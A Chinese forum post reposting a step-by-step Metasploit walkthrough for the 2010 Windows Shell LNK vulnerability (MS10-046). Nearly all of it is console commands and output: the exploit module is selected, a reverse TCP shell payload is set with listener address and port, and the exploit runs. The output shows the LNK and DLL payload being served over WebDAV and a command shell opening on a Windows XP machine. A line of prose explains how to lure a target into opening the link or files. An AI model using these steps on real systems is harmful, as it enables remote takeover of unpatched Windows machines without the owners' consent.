无忧启动论坛

 找回密码
 注册
搜索
系统gho:最纯净好用系统下载站投放广告、加入VIP会员,请联系 微信:wuyouceo
查看: 1979|回复: 0
打印 上一主题 下一主题

[转载]微软lnk漏洞实战演练

[复制链接]
跳转到指定楼层
1#
发表于 2010-8-17 20:54:01 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
下载最新版“Metasploit Framework”溢出工具,内包含lnk漏洞利用文件。
Metasploit Framework官网:http://www.metasploit.com

msf > search lnk        #查找lnk漏洞利用文件,如果不是最新版请使用svn update更新。
  • Searching loaded modules for pattern lnk...
    Exploits
    ========

    Name                                                Rank       Description
    ----                                                ----       -----------
    windows/browser/ms10_046_shortcut_icon_dllloader    excellent  Microsoft Windows Shell LNK Code Execution
    msf > use windows/browser/ms10_046_shortcut_icon_dllloader      #选择漏洞利用文件
    msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/shell/reverse_tcp    #为漏洞加入ShellCode
    payload => windows/shell/reverse_tcp
    msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.12.110
    lhost => 192.168.12.110
    msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.12.110
    srvhost => 192.168.12.110
    msf exploit(ms10_046_shortcut_icon_dllloader) > show options

    Module options:
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    SRVHOST  192.168.12.110   yes       The local host to listen on.
    SRVPORT  80               yes       The daemon port to listen on (do not change)
    UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
    URIPATH  /                yes       The URI to use (do not change).


    Payload options (windows/shell/reverse_tcp):
       Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique: seh, thread, process
    LHOST     192.168.12.110   yes       The listen address
    LPORT     4444             yes       The listen port


    Exploit target:
    Id  Name
    --  ----
    0   Automatic


    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
  • Exploit running as background job.
    msf exploit(ms10_046_shortcut_icon_dllloader) >
  • Started reverse handler on 192.168.12.110:4444
  • Send vulnerable clients to \\192.168.12.110\LjWqptMQY\.
  • Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
  • Using URL: http://192.168.12.110:80/
  • Server started.
    现在只要在对方浏览器中输入http://192.168.12.110:80或将\\192.168.12.110\LjWqptMQY\下的两个文件放入其他机器中,只需要用资源管理器打开就会访问Shell。
  • Sending UNC redirect to 192.168.12.110:4611 ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY
  • Sending 301 for /LjWqptMQY ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4622 /LjWqptMQY/
  • Sending directory multistatus for /LjWqptMQY/ ...
  • Responding to WebDAV OPTIONS request from 192.168.12.110:4624
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
  • Sending 301 for /LjWqptMQY ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
  • Sending directory multistatus for /LjWqptMQY/ ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
  • Sending 301 for /LjWqptMQY ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
  • Sending directory multistatus for /LjWqptMQY/ ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY
  • Sending 301 for /LjWqptMQY ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/
  • Sending directory multistatus for /LjWqptMQY/ ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/desktop.ini
  • Sending 404 for /LjWqptMQY/desktop.ini ...
  • Sending LNK file to 192.168.12.110:4624 ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.manifest
  • Sending 404 for /LjWqptMQY/PUcA.dll.manifest ...
  • Sending DLL payload 192.168.12.110:4624 ...
  • Received WebDAV PROPFIND request from 192.168.12.110:4624 /LjWqptMQY/PUcA.dll.123.Manifest
  • Sending 404 for /LjWqptMQY/PUcA.dll.123.Manifest ...
  • Sending stage (240 bytes) to 192.168.12.110
  • Command shell session 1 opened (192.168.12.110:4444 -> 192.168.12.110:4625) at 2010-08-14 10:10:13 +0800
    msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
  • Starting interaction with 1...
    C:\Documents and Settings\test\桌面>

    Microsoft Windows XP [版本 5.1.2600]
  • 您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

    闽公网安备 35020302032614号

    GMT+8, 2026-1-23 04:39

    Powered by Discuz! X3.3

    © 2001-2017 Comsenz Inc.

    快速回复 返回顶部 返回列表